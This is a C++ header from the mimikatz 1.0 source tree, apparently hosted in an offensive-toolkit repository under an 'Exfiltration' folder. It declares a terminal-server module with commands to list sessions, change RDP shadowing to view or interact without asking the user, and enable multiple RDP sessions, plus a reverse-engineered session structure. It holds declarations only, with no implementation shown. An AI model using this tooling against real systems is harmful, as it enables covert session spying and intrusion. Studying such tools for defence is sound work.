aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h
blob: 5af9492e93c4409adb7b638b9ce27f3cf1574ebb (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
/*	Benjamin DELPY `gentilkiwi`
	http://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#include "globdefs.h"
#include "mod_ts.h"
#include "mod_process.h"
#include "mod_memory.h"
#include "mod_patch.h"
#include <iostream>

class mod_mimikatz_terminalserver
{
public:
	static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands();

	static bool sessions(vector<wstring> * arguments);
	static bool processes(vector<wstring> * arguments);
	static bool viewshadow(vector<wstring> * arguments);
	static bool modifyshadow(vector<wstring> * arguments);
	static bool multirdp(vector<wstring> * arguments);
	
private:
	static bool listAndOrModifySession(DWORD * id = NULL, DWORD * newState = NULL);
	static wstring shadowToType(DWORD shadow);
	static wstring stateToType(DWORD state);

	enum KIWI_SHADOW_TYPE {
		SHADOW_DISABLE = 0,
		SHADOW_INTERACT = 1,
		SHADOW_INTERACT_NOASK = 2,
		SHADOW_VIEW = 3,
		SHADOW_VIEW_NOASK = 4
	};

	typedef struct _KIWI_TS_SESSION {
		PBYTE next;
		PBYTE prev;
		PBYTE unk1;
		PBYTE refLock;
		PBYTE unk2;
		BYTE  unk3[8];
		DWORD id;
		wchar_t name[32+1];
		BYTE unk4[7434];
		wchar_t sname[32+1];
		wchar_t type[32+1];
		BYTE unk5[1684];
		DWORD shadow;
	} KIWI_TS_SESSION, * PKIWI_TS_SESSION;

};